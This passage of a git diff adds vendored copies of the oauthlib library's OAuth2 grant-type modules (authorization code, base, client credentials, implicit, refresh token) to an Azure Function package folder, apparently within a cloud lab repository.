'scope', 'state'): + try: + duplicate_params = request.duplicate_params + except ValueError: + raise errors.InvalidRequestFatalError(description='Unable to parse query string', request=request) + if param in duplicate_params: + raise errors.InvalidRequestFatalError(description='Duplicate %s parameter.' % param, request=request) + + # REQUIRED. The client identifier as described in Section 2.2. + # https://tools.ietf.org/html/rfc6749#section-2.2 + if not request.client_id: + raise errors.MissingClientIdError(request=request) + + if not self.request_validator.validate_client_id(request.client_id, request): + raise errors.InvalidClientIdError(request=request) + + # OPTIONAL. As described in Section 3.1.2. + # https://tools.ietf.org/html/rfc6749#section-3.1.2 + log.debug('Validating redirection uri %s for client %s.', + request.redirect_uri, request.client_id) + + # OPTIONAL. As described in Section 3.1.2. + # https://tools.ietf.org/html/rfc6749#section-3.1.2 + self._handle_redirects(request) + + # Then check for normal errors. + + # If the resource owner denies the access request or if the request + # fails for reasons other than a missing or invalid redirection URI, + # the authorization server informs the client by adding the following + # parameters to the query component of the redirection URI using the + # "application/x-www-form-urlencoded" format, per Appendix B. + # https://tools.ietf.org/html/rfc6749#appendix-B + + # Note that the correct parameters to be added are automatically + # populated through the use of specific exceptions. + + request_info = {} + for validator in self.custom_validators.pre_auth: + request_info.update(validator(request)) + + # REQUIRED. + if request.response_type is None: + raise errors.MissingResponseTypeError(request=request) + # Value MUST be set to "code" or one of the OpenID authorization code including + # response_types "code token", "code id_token", "code token id_token" + elif not 'code' in request.response_type and request.response_type != 'none': + raise errors.UnsupportedResponseTypeError(request=request) + + if not self.request_validator.validate_response_type(request.client_id, + request.response_type, + request.client, request): + + log.debug('Client %s is not authorized to use response_type %s.', + request.client_id, request.response_type) + raise errors.UnauthorizedClientError(request=request) + + # OPTIONAL. Validate PKCE request or reply with "error"/"invalid_request" + # https://tools.ietf.org/html/rfc6749#section-4.4.1 + if self.request_validator.is_pkce_required(request.client_id, request) is True: + if request.code_challenge is None: + raise errors.MissingCodeChallengeError(request=request) + + if request.code_challenge is not None: + request_info["code_challenge"] = request.code_challenge + + # OPTIONAL, defaults to "plain" if not present in the request. + if request.code_challenge_method is None: + request.code_challenge_method = "plain" + + if request.code_challenge_method not in self._code_challenge_methods: + raise errors.UnsupportedCodeChallengeMethodError(request=request) + request_info["code_challenge_method"] = request.code_challenge_method + + # OPTIONAL. The scope of the access request as described by Section 3.3 + # https://tools.ietf.org/html/rfc6749#section-3.3 + self.validate_scopes(request) + + request_info.update({ + 'client_id': request.client_id, + 'redirect_uri': request.redirect_uri, + 'response_type': request.response_type, + 'state': request.state, + 'request': request + }) + + for validator in self.custom_validators.post_auth: + request_info.update(validator(request)) + + return request.scopes, request_info + + def validate_token_request(self, request): + """ + :param request: OAuthlib request. + :type request: oauthlib.common.Request + """ + # REQUIRED. Value MUST be set to "authorization_code". + if request.grant_type not in ('authorization_code', 'openid'): + raise errors.UnsupportedGrantTypeError(request=request) + + for validator in self.custom_validators.pre_token: + validator(request) + + if request.code is None: + raise errors.InvalidRequestError( + description='Missing code parameter.', request=request) + + for param in ('client_id', 'grant_type', 'redirect_uri'): + if param in request.duplicate_params: + raise errors.InvalidRequestError(description='Duplicate %s parameter.' % param, + request=request) + + if self.request_validator.client_authentication_required(request): + # If the client type is confidential or the client was issued client + # credentials (or assigned other authentication requirements), the + # client MUST authenticate with the authorization server as described + # in Section 3.2.1. + # https://tools.ietf.org/html/rfc6749#section-3.2.1 + if not self.request_validator.authenticate_client(request): + log.debug('Client authentication failed, %r.', request) + raise errors.InvalidClientError(request=request) + elif not self.request_validator.authenticate_client_id(request.client_id, request): + # REQUIRED, if the client is not authenticating with the + # authorization server as described in Section 3.2.1. + # https://tools.ietf.org/html/rfc6749#section-3.2.1 + log.debug('Client authentication failed, %r.', request) + raise errors.InvalidClientError(request=request) + + if not hasattr(request.client, 'client_id'): + raise NotImplementedError('Authenticate client must set the ' + 'request.client.client_id attribute ' + 'in authenticate_client.') + + request.client_id = request.client_id or request.client.client_id + + # Ensure client is authorized use of this grant type + self.validate_grant_type(request) + + # REQUIRED. The authorization code received from the + # authorization server. + if not self.request_validator.validate_code(request.client_id, + request.code, request.client, request): + log.debug('Client, %r (%r), is not allowed access to scopes %r.', + request.client_id, request.client, request.scopes) + raise errors.InvalidGrantError(request=request) + + # OPTIONAL. Validate PKCE code_verifier + challenge = self.request_validator.get_code_challenge(request.code, request) + + if challenge is not None: + if request.code_verifier is None: + raise errors.MissingCodeVerifierError(request=request) + + challenge_method = self.request_validator.get_code_challenge_method(request.code, request) + if challenge_method is None: + raise errors.InvalidGrantError(request=request, description="Challenge method not found") + + if challenge_method not in self._code_challenge_methods: + raise errors.ServerError( + description="code_challenge_method {} is not supported.".format(challenge_method), + request=request + ) + + if not self.validate_code_challenge(challenge, + challenge_method, + request.code_verifier): + log.debug('request provided a invalid code_verifier.') + raise errors.InvalidGrantError(request=request) + elif self.request_validator.is_pkce_required(request.client_id, request) is True: + if request.code_verifier is None: + raise errors.MissingCodeVerifierError(request=request) + raise errors.InvalidGrantError(request=request, description="Challenge not found") + + for attr in ('user', 'scopes'): + if getattr(request, attr, None) is None: + log.debug('request.%s was not set on code validation.', attr) + + # REQUIRED, if the "redirect_uri" parameter was included in the + # authorization request as described in Section 4.1.1, and their + # values MUST be identical. + if request.redirect_uri is None: + request.using_default_redirect_uri = True + request.redirect_uri = self.request_validator.get_default_redirect_uri( + request.client_id, request) + log.debug('Using default redirect_uri %s.', request.redirect_uri) + if not request.redirect_uri: + raise errors.MissingRedirectURIError(request=request) + else: + request.using_default_redirect_uri = False + log.debug('Using provided redirect_uri %s', request.redirect_uri) + + if not self.request_validator.confirm_redirect_uri(request.client_id, request.code, + request.redirect_uri, request.client, + request): + log.debug('Redirect_uri (%r) invalid for client %r (%r).', + request.redirect_uri, request.client_id, request.client) + raise errors.MismatchingRedirectURIError(request=request) + + for validator in self.custom_validators.post_token: + validator(request) + + def validate_code_challenge(self, challenge, challenge_method, verifier): + if challenge_method in self._code_challenge_methods: + return self._code_challenge_methods[challenge_method](verifier, challenge) + raise NotImplementedError('Unknown challenge_method %s' % challenge_method) + + def _create_cors_headers(self, request): + """If CORS is allowed, create the appropriate headers.""" + if 'origin' not in request.headers: + return {} + + origin = request.headers['origin'] + if not is_secure_transport(origin): + log.debug('Origin "%s" is not HTTPS, CORS not allowed.', origin) + return {} + elif not self.request_validator.is_origin_allowed( + request.client_id, origin, request): + log.debug('Invalid origin "%s", CORS not allowed.', origin) + return {} + else: + log.debug('Valid origin "%s", injecting CORS headers.', origin) + return {'Access-Control-Allow-Origin': origin} diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/base.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/base.py new file mode 100644 index 0000000..b2c1014 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/base.py @@ -0,0 +1,250 @@ +""" +oauthlib.oauth2.rfc6749.grant_types +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +""" +import logging +from itertools import chain + +from oauthlib.common import add_params_to_uri +from oauthlib.oauth2.rfc6749 import errors, utils +from oauthlib.uri_validate import is_absolute_uri + +from ..request_validator import RequestValidator + +log = logging.getLogger(__name__) + + +class ValidatorsContainer: + """ + Container object for holding custom validator callables to be invoked + as part of the grant type `validate_authorization_request()` or + `validate_authorization_request()` methods on the various grant types. + + Authorization validators must be callables that take a request object and + return a dict, which may contain items to be added to the `request_info` + returned from the grant_type after validation. + + Token validators must be callables that take a request object and + return None. + + Both authorization validators and token validators may raise OAuth2 + exceptions if validation conditions fail. + + Authorization validators added to `pre_auth` will be run BEFORE + the standard validations (but after the critical ones that raise + fatal errors) as part of `validate_authorization_request()` + + Authorization validators added to `post_auth` will be run AFTER + the standard validations as part of `validate_authorization_request()` + + Token validators added to `pre_token` will be run BEFORE + the standard validations as part of `validate_token_request()` + + Token validators added to `post_token` will be run AFTER + the standard validations as part of `validate_token_request()` + + For example: + + >>> def my_auth_validator(request): + ... return {'myval': True} + >>> auth_code_grant = AuthorizationCodeGrant(request_validator) + >>> auth_code_grant.custom_validators.pre_auth.append(my_auth_validator) + >>> def my_token_validator(request): + ... if not request.everything_okay: + ... raise errors.OAuth2Error("uh-oh") + >>> auth_code_grant.custom_validators.post_token.append(my_token_validator) + """ + + def __init__(self, post_auth, post_token, + pre_auth, pre_token): + self.pre_auth = pre_auth + self.post_auth = post_auth + self.pre_token = pre_token + self.post_token = post_token + + @property + def all_pre(self): + return chain(self.pre_auth, self.pre_token) + + @property + def all_post(self): + return chain(self.post_auth, self.post_token) + + +class GrantTypeBase: + error_uri = None + request_validator = None + default_response_mode = 'fragment' + refresh_token = True + response_types = ['code'] + + def __init__(self, request_validator=None, **kwargs): + self.request_validator = request_validator or RequestValidator() + + # Transforms class variables into instance variables: + self.response_types = self.response_types + self.refresh_token = self.refresh_token + self._setup_custom_validators(kwargs) + self._code_modifiers = [] + self._token_modifiers = [] + + for kw, val in kwargs.items(): + setattr(self, kw, val) + + def _setup_custom_validators(self, kwargs): + post_auth = kwargs.get('post_auth', []) + post_token = kwargs.get('post_token', []) + pre_auth = kwargs.get('pre_auth', []) + pre_token = kwargs.get('pre_token', []) + if not hasattr(self, 'validate_authorization_request'): + if post_auth or pre_auth: + msg = ("{} does not support authorization validators. Use " + "token validators instead.").format(self.__class__.__name__) + raise ValueError(msg) + # Using tuples here because they can't be appended to: + post_auth, pre_auth = (), () + self.custom_validators = ValidatorsContainer(post_auth, post_token, + pre_auth, pre_token) + + def register_response_type(self, response_type): + self.response_types.append(response_type) + + def register_code_modifier(self, modifier): + self._code_modifiers.append(modifier) + + def register_token_modifier(self, modifier): + self._token_modifiers.append(modifier) + + def create_authorization_response(self, request, token_handler): + """ + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :param token_handler: A token handler instance, for example of type + oauthlib.oauth2.BearerToken. + """ + raise NotImplementedError('Subclasses must implement this method.') + + def create_token_response(self, request, token_handler): + """ + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :param token_handler: A token handler instance, for example of type + oauthlib.oauth2.BearerToken. + """ + raise NotImplementedError('Subclasses must implement this method.') + + def add_token(self, token, token_handler, request): + """ + :param token: + :param token_handler: A token handler instance, for example of type + oauthlib.oauth2.BearerToken. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + """ + # Only add a hybrid access token on auth step if asked for + if not request.response_type in ["token", "code token", "id_token token", "code id_token token"]: + return token + + token.update(token_handler.create_token(request, refresh_token=False)) + return token + + def validate_grant_type(self, request): + """ + :param request: OAuthlib request. + :type request: oauthlib.common.Request + """ + client_id = getattr(request, 'client_id', None) + if not self.request_validator.validate_grant_type(client_id, + request.grant_type, request.client, request): + log.debug('Unauthorized from %r (%r) access to grant type %s.', + request.client_id, request.client, request.grant_type) + raise errors.UnauthorizedClientError(request=request) + + def validate_scopes(self, request): + """ + :param request: OAuthlib request. + :type request: oauthlib.common.Request + """ + if not request.scopes: + request.scopes = utils.scope_to_list(request.scope) or utils.scope_to_list( + self.request_validator.get_default_scopes(request.client_id, request)) + log.debug('Validating access to scopes %r for client %r (%r).', + request.scopes, request.client_id, request.client) + if not self.request_validator.validate_scopes(request.client_id, + request.scopes, request.client, request): + raise errors.InvalidScopeError(request=request) + + def prepare_authorization_response(self, request, token, headers, body, status): + """Place token according to response mode. + + Base classes can define a default response mode for their authorization + response by overriding the static `default_response_mode` member. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :param token: + :param headers: + :param body: + :param status: + """ + request.response_mode = request.response_mode or self.default_response_mode + + if request.response_mode not in ('query', 'fragment'): + log.debug('Overriding invalid response mode %s with %s', + request.response_mode, self.default_response_mode) + request.response_mode = self.default_response_mode + + token_items = token.items() + + if request.response_type == 'none': + state = token.get('state', None) + if state: + token_items = [('state', state)] + else: + token_items = [] + + if request.response_mode == 'query': + headers['Location'] = add_params_to_uri( + request.redirect_uri, token_items, fragment=False) + return headers, body, status + + if request.response_mode == 'fragment': + headers['Location'] = add_params_to_uri( + request.redirect_uri, token_items, fragment=True) + return headers, body, status + + raise NotImplementedError( + 'Subclasses must set a valid default_response_mode') + + def _get_default_headers(self): + """Create default headers for grant responses.""" + return { + 'Content-Type': 'application/json', + 'Cache-Control': 'no-store', + 'Pragma': 'no-cache', + } + + def _handle_redirects(self, request): + if request.redirect_uri is not None: + request.using_default_redirect_uri = False + log.debug('Using provided redirect_uri %s', request.redirect_uri) + if not is_absolute_uri(request.redirect_uri): + raise errors.InvalidRedirectURIError(request=request) + + # The authorization server MUST verify that the redirection URI + # to which it will redirect the access token matches a + # redirection URI registered by the client as described in + # Section 3.1.2. + # https://tools.ietf.org/html/rfc6749#section-3.1.2 + if not self.request_validator.validate_redirect_uri( + request.client_id, request.redirect_uri, request): + raise errors.MismatchingRedirectURIError(request=request) + else: + request.redirect_uri = self.request_validator.get_default_redirect_uri( + request.client_id, request) + request.using_default_redirect_uri = True + log.debug('Using default redirect_uri %s.', request.redirect_uri) + if not request.redirect_uri: + raise errors.MissingRedirectURIError(request=request) + if not is_absolute_uri(request.redirect_uri): + raise errors.InvalidRedirectURIError(request=request) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py new file mode 100644 index 0000000..83db148 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py @@ -0,0 +1,123 @@ +""" +oauthlib.oauth2.rfc6749.grant_types +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +""" +import json +import logging + +from .. import errors +from .base import GrantTypeBase + +log = logging.getLogger(__name__) + + +class ClientCredentialsGrant(GrantTypeBase): + + """`Client Credentials Grant`_ + + The client can request an access token using only its client + credentials (or other supported means of authentication) when the + client is requesting access to the protected resources under its + control, or those of another resource owner that have been previously + arranged with the authorization server (the method of which is beyond + the scope of this specification). + + The client credentials grant type MUST only be used by confidential + clients:: + + +---------+ +---------------+ + : : : : + : :>-- A - Client Authentication --->: Authorization : + : Client : : Server : + : :<-- B ---- Access Token ---------<: : + : : : : + +---------+ +---------------+ + + Figure 6: Client Credentials Flow + + The flow illustrated in Figure 6 includes the following steps: + + (A) The client authenticates with the authorization server and + requests an access token from the token endpoint. + + (B) The authorization server authenticates the client, and if valid, + issues an access token. + + .. _`Client Credentials Grant`: https://tools.ietf.org/html/rfc6749#section-4.4 + """ + + def create_token_response(self, request, token_handler): + """Return token or error in JSON format. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :param token_handler: A token handler instance, for example of type + oauthlib.oauth2.BearerToken. + + If the access token request is valid and authorized, the + authorization server issues an access token as described in + `Section 5.1`_. A refresh token SHOULD NOT be included. If the request + failed client authentication or is invalid, the authorization server + returns an error response as described in `Section 5.2`_. + + .. _`Section 5.1`: https://tools.ietf.org/html/rfc6749#section-5.1 + .. _`Section 5.2`: https://tools.ietf.org/html/rfc6749#section-5.2 + """ + headers = self._get_default_headers() + try: + log.debug('Validating access token request, %r.', request) + self.validate_token_request(request) + except errors.OAuth2Error as e: + log.debug('Client error in token request. %s.', e) + headers.update(e.headers) + return headers, e.json, e.status_code + + token = token_handler.create_token(request, refresh_token=False) + + for modifier in self._token_modifiers: + token = modifier(token) + + self.request_validator.save_token(token, request) + + log.debug('Issuing token to client id %r (%r), %r.', + request.client_id, request.client, token) + return headers, json.dumps(token), 200 + + def validate_token_request(self, request): + """ + :param request: OAuthlib request. + :type request: oauthlib.common.Request + """ + for validator in self.custom_validators.pre_token: + validator(request) + + if not getattr(request, 'grant_type', None): + raise errors.InvalidRequestError('Request is missing grant type.', + request=request) + + if not request.grant_type == 'client_credentials': + raise errors.UnsupportedGrantTypeError(request=request) + + for param in ('grant_type', 'scope'): + if param in request.duplicate_params: + raise errors.InvalidRequestError(description='Duplicate %s parameter.' % param, + request=request) + + log.debug('Authenticating client, %r.', request) + if not self.request_validator.authenticate_client(request): + log.debug('Client authentication failed, %r.', request) + raise errors.InvalidClientError(request=request) + else: + if not hasattr(request.client, 'client_id'): + raise NotImplementedError('Authenticate client must set the ' + 'request.client.client_id attribute ' + 'in authenticate_client.') + # Ensure client is authorized use of this grant type + self.validate_grant_type(request) + + request.client_id = request.client_id or request.client.client_id + log.debug('Authorizing access to client %r.', request.client_id) + self.validate_scopes(request) + + for validator in self.custom_validators.post_token: + validator(request) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/implicit.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/implicit.py new file mode 100644 index 0000000..74bc7cf --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/implicit.py @@ -0,0 +1,376 @@ +""" +oauthlib.oauth2.rfc6749.grant_types +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +""" +import logging + +from oauthlib import common + +from .. import errors +from .base import GrantTypeBase + +log = logging.getLogger(__name__) + + +class ImplicitGrant(GrantTypeBase): + + """`Implicit Grant`_ + + The implicit grant type is used to obtain access tokens (it does not + support the issuance of refresh tokens) and is optimized for public + clients known to operate a particular redirection URI. These clients + are typically implemented in a browser using a scripting language + such as JavaScript. + + Unlike the authorization code grant type, in which the client makes + separate requests for authorization and for an access token, the + client receives the access token as the result of the authorization + request. + + The implicit grant type does not include client authentication, and + relies on the presence of the resource owner and the registration of + the redirection URI. Because the access token is encoded into the + redirection URI, it may be exposed to the resource owner and other + applications residing on the same device:: + + +----------+ + | Resource | + | Owner | + | | + +----------+ + ^ + | + (B) + +----|-----+ Client Identifier +---------------+ + | -+----(A)-- & Redirection URI --->| | + | User- | | Authorization | + | Agent -|----(B)-- User authenticates -->| Server | + | | | | + | |<---(C)--- Redirection URI ----<| | + | | with Access Token +---------------+ + | | in Fragment + | | +---------------+ + | |----(D)--- Redirection URI ---->| Web-Hosted | + | | without Fragment | Client | + | | | Resource | + | (F) |<---(E)------- Script ---------<| | + | | +---------------+ + +-|--------+ + | | + (A) (G) Access Token + | | + ^ v + +---------+ + | | + | Client | + | | + +---------+ + + Note: The lines illustrating steps (A) and (B) are broken into two + parts as they pass through the user-agent. + + Figure 4: Implicit Grant Flow + + The flow illustrated in Figure 4 includes the following steps: + + (A) The client initiates the flow by directing the resource owner's + user-agent to the authorization endpoint. The client includes + its client identifier, requested scope, local state, and a + redirection URI to which the authorization server will send the + user-agent back once access is granted (or denied). + + (B) The authorization server authenticates the resource owner (via + the user-agent) and establishes whether the resource owner + grants or denies the client's access request. + + (C) Assuming the resource owner grants access, the authorization + server redirects the user-agent back to the client using the + redirection URI provided earlier. The redirection URI includes + the access token in the URI fragment. + + (D) The user-agent follows the redirection instructions by making a + request to the web-hosted client resource (which does not + include the fragment per [RFC2616]). The user-agent retains the + fragment information locally. + + (E) The web-hosted client resource returns a web page (typically an + HTML document with an embedded script) capable of accessing the + full redirection URI including the fragment retained by the + user-agent, and extracting the access token (and other + parameters) contained in the fragment. + + (F) The user-agent executes the script provided by the web-hosted + client resource locally, which extracts the access token. + + (G) The user-agent passes the access token to the client. + + See `Section 10.3`_ and `Section 10.16`_ for important security considerations + when using the implicit grant. + + .. _`Implicit Grant`: https://tools.ietf.org/html/rfc6749#section-4.2 + .. _`Section 10.3`: https://tools.ietf.org/html/rfc6749#section-10.3 + .. _`Section 10.16`: https://tools.ietf.org/html/rfc6749#section-10.16 + """ + + response_types = ['token'] + grant_allows_refresh_token = False + + def create_authorization_response(self, request, token_handler): + """Create an authorization response. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :param token_handler: A token handler instance, for example of type + oauthlib.oauth2.BearerToken. + + The client constructs the request URI by adding the following + parameters to the query component of the authorization endpoint URI + using the "application/x-www-form-urlencoded" format, per `Appendix B`_: + + response_type + REQUIRED. Value MUST be set to "token" for standard OAuth2 implicit flow + or "id_token token" or just "id_token" for OIDC implicit flow + + client_id + REQUIRED. The client identifier as described in `Section 2.2`_. + + redirect_uri + OPTIONAL. As described in `Section 3.1.2`_. + + scope + OPTIONAL. The scope of the access request as described by + `Section 3.3`_. + + state + RECOMMENDED. An opaque value used by the client to maintain + state between the request and callback. The authorization + server includes this value when redirecting the user-agent back + to the client. The parameter SHOULD be used for preventing + cross-site request forgery as described in `Section 10.12`_. + + The authorization server validates the request to ensure that all + required parameters are present and valid. The authorization server + MUST verify that the redirection URI to which it will redirect the + access token matches a redirection URI registered by the client as + described in `Section 3.1.2`_. + + .. _`Section 2.2`: https://tools.ietf.org/html/rfc6749#section-2.2 + .. _`Section 3.1.2`: https://tools.ietf.org/html/rfc6749#section-3.1.2 + .. _`Section 3.3`: https://tools.ietf.org/html/rfc6749#section-3.3 + .. _`Section 10.12`: https://tools.ietf.org/html/rfc6749#section-10.12 + .. _`Appendix B`: https://tools.ietf.org/html/rfc6749#appendix-B + """ + return self.create_token_response(request, token_handler) + + def create_token_response(self, request, token_handler): + """Return token or error embedded in the URI fragment. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :param token_handler: A token handler instance, for example of type + oauthlib.oauth2.BearerToken. + + If the resource owner grants the access request, the authorization + server issues an access token and delivers it to the client by adding + the following parameters to the fragment component of the redirection + URI using the "application/x-www-form-urlencoded" format, per + `Appendix B`_: + + access_token + REQUIRED. The access token issued by the authorization server. + + token_type + REQUIRED. The type of the token issued as described in + `Section 7.1`_. Value is case insensitive. + + expires_in + RECOMMENDED. The lifetime in seconds of the access token. For + example, the value "3600" denotes that the access token will + expire in one hour from the time the response was generated. + If omitted, the authorization server SHOULD provide the + expiration time via other means or document the default value. + + scope + OPTIONAL, if identical to the scope requested by the client; + otherwise, REQUIRED. The scope of the access token as + described by `Section 3.3`_. + + state + REQUIRED if the "state" parameter was present in the client + authorization request. The exact value received from the + client. + + The authorization server MUST NOT issue a refresh token. + + .. _`Appendix B`: https://tools.ietf.org/html/rfc6749#appendix-B + .. _`Section 3.3`: https://tools.ietf.org/html/rfc6749#section-3.3 + .. _`Section 7.1`: https://tools.ietf.org/html/rfc6749#section-7.1 + """ + try: + self.validate_token_request(request) + + # If the request fails due to a missing, invalid, or mismatching + # redirection URI, or if the client identifier is missing or invalid, + # the authorization server SHOULD inform the resource owner of the + # error and MUST NOT automatically redirect the user-agent to the + # invalid redirection URI. + except errors.FatalClientError as e: + log.debug('Fatal client error during validation of %r. %r.', + request, e) + raise + + # If the resource owner denies the access request or if the request + # fails for reasons other than a missing or invalid redirection URI, + # the authorization server informs the client by adding the following + # parameters to the fragment component of the redirection URI using the + # "application/x-www-form-urlencoded" format, per Appendix B: + # https://tools.ietf.org/html/rfc6749#appendix-B + except errors.OAuth2Error as e: + log.debug('Client error during validation of %r. %r.', request, e) + return {'Location': common.add_params_to_uri(request.redirect_uri, e.twotuples, + fragment=True)}, None, 302 + + # In OIDC implicit flow it is possible to have a request_type that does not include the access_token! + # "id_token token" - return the access token and the id token + # "id_token" - don't return the access token + if "token" in request.response_type.split(): + token = token_handler.create_token(request, refresh_token=False) + else: + token = {} + + if request.state is not None: + token['state'] = request.state + + for modifier in self._token_modifiers: + token = modifier(token, token_handler, request) + + # In OIDC implicit flow it is possible to have a request_type that does + # not include the access_token! In this case there is no need to save a token. + if "token" in request.response_type.split(): + self.request_validator.save_token(token, request) + + return self.prepare_authorization_response( + request, token, {}, None, 302) + + def validate_authorization_request(self, request): + """ + :param request: OAuthlib request. + :type request: oauthlib.common.Request + """ + return self.validate_token_request(request) + + def validate_token_request(self, request): + """Check the token request for normal and fatal errors. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + + This method is very similar to validate_authorization_request in + the AuthorizationCodeGrant but differ in a few subtle areas. + + A normal error could be a missing response_type parameter or the client + attempting to access scope it is not allowed to ask authorization for. + Normal errors can safely be included in the redirection URI and + sent back to the client. + + Fatal errors occur when the client_id or redirect_uri is invalid or + missing. These must be caught by the provider and handled, how this + is done is outside of the scope of OAuthLib but showing an error + page describing the issue is a good idea. + """ + + # First check for fatal errors + + # If the request fails due to a missing, invalid, or mismatching + # redirection URI, or if the client identifier is missing or invalid, + # the authorization server SHOULD inform the resource owner of the + # error and MUST NOT automatically redirect the user-agent to the + # invalid redirection URI. + + # First check duplicate parameters + for param in ('client_id', 'response_type', 'redirect_uri', 'scope', 'state'): + try: + duplicate_params = request.duplicate_params + except ValueError: + raise errors.InvalidRequestFatalError(description='Unable to parse query string', request=request) + if param in duplicate_params: + raise errors.InvalidRequestFatalError(description='Duplicate %s parameter.' % param, request=request) + + # REQUIRED. The client identifier as described in Section 2.2. + # https://tools.ietf.org/html/rfc6749#section-2.2 + if not request.client_id: + raise errors.MissingClientIdError(request=request) + + if not self.request_validator.validate_client_id(request.client_id, request): + raise errors.InvalidClientIdError(request=request) + + # OPTIONAL. As described in Section 3.1.2. + # https://tools.ietf.org/html/rfc6749#section-3.1.2 + self._handle_redirects(request) + + # Then check for normal errors. + + request_info = self._run_custom_validators(request, + self.custom_validators.all_pre) + + # If the resource owner denies the access request or if the request + # fails for reasons other than a missing or invalid redirection URI, + # the authorization server informs the client by adding the following + # parameters to the fragment component of the redirection URI using the + # "application/x-www-form-urlencoded" format, per Appendix B. + # https://tools.ietf.org/html/rfc6749#appendix-B + + # Note that the correct parameters to be added are automatically + # populated through the use of specific exceptions + + # REQUIRED. + if request.response_type is None: + raise errors.MissingResponseTypeError(request=request) + # Value MUST be one of our registered types: "token" by default or if using OIDC "id_token" or "id_token token" + elif not set(request.response_type.split()).issubset(self.response_types): + raise errors.UnsupportedResponseTypeError(request=request) + + log.debug('Validating use of response_type token for client %r (%r).', + request.client_id, request.client) + if not self.request_validator.validate_response_type(request.client_id, + request.response_type, + request.client, request): + + log.debug('Client %s is not authorized to use response_type %s.', + request.client_id, request.response_type) + raise errors.UnauthorizedClientError(request=request) + + # OPTIONAL. The scope of the access request as described by Section 3.3 + # https://tools.ietf.org/html/rfc6749#section-3.3 + self.validate_scopes(request) + + request_info.update({ + 'client_id': request.client_id, + 'redirect_uri': request.redirect_uri, + 'response_type': request.response_type, + 'state': request.state, + 'request': request, + }) + + request_info = self._run_custom_validators( + request, + self.custom_validators.all_post, + request_info + ) + + return request.scopes, request_info + + def _run_custom_validators(self, + request, + validations, + request_info=None): + # Make a copy so we don't modify the existing request_info dict + request_info = {} if request_info is None else request_info.copy() + # For implicit grant, auth_validators and token_validators are + # basically equivalent since the token is returned from the + # authorization endpoint. + for validator in validations: + result = validator(request) + if result is not None: + request_info.update(result) + return request_info diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/refresh_token.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/refresh_token.py new file mode 100644 index 0000000..4beee1a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/refresh_token.py @@ -0,0 +1,135 @@ +""" +oauthlib.oauth2.rfc6749.grant_types +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +""" +import json +import logging + +from .. import errors, utils +from .base import GrantTypeBase + +log = logging.getLogger(__name__) + + +class RefreshTokenGrant(GrantTypeBase): + + """`Refresh token grant`_ + + .. _`Refresh token grant`: https://tools.ietf.org/html/rfc6749#section-6 + """ + + def __init__(self, request_validator=None, + issue_new_refresh_tokens=True, + **kwargs): + super().__init__( + request_validator, + issue_new_refresh_tokens=issue_new_refresh_tokens, + **kwargs) + + def create_token_response(self, request, token_handler): + """Create a new access token from a refresh_token. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :param token_handler: A token handler instance, for example of type + oauthlib.oauth2.BearerToken. + + If valid and authorized, the authorization server issues an access + token as described in `Section 5.1`_. If the request failed + verification or is invalid, the authorization server returns an error + response as described in `Section 5.2`_. + + The authorization server MAY issue a new refresh token, in which case + the client MUST discard the old refresh token and replace it with the + new refresh token. The authorization server MAY revoke the old + refresh token after issuing a new refresh token to the client. If a + new refresh token is issued, the refresh token scope MUST be + identical to that of the refresh token included by the client in the + request. + + .. _`Section 5.1`: https://tools.ietf.org/html/rfc6749#section-5.1 + .. _`Section 5.2`: https://tools.ietf.org/html/rfc6749#section-5.2 + """ + headers = self._get_default_headers() + try: + log.debug('Validating refresh token request, %r.', request) + self.validate_token_request(request) + except errors.OAuth2Error as e: + log.debug('Client error in token request, %s.', e) + headers.update(e.headers) + return headers, e.json, e.status_code + + token = token_handler.create_token(request, + refresh_token=self.issue_new_refresh_tokens) + + for modifier in self._token_modifiers: + token = modifier(token, token_handler, request) + + self.request_validator.save_token(token, request) + + log.debug('Issuing new token to client id %r (%r), %r.', + request.client_id, request.client, token) + return headers, json.dumps(token), 200 + + def validate_token_request(self, request): + """ + :param request: OAuthlib request. + :type request: oauthlib.common.Request + """ + # REQUIRED. Value MUST be set to "refresh_token". + if request.grant_type != 'refresh_token': + raise errors.UnsupportedGrantTypeError(request=request) + + for validator in self.custom_validators.pre_token: + validator(request) + + if request.refresh_token is None: + raise errors.InvalidRequestError( + description='Missing refresh token parameter.', + request=request) + + # Because refresh tokens are typically long-lasting credentials used to + # request additional access tokens, the refresh token is bound to the + # client to which it was issued. If the client type is confidential or + # the client was issued client credentials (or assigned other + # authentication requirements), the client MUST authenticate with the + # authorization server as described in Section 3.2.1. + # 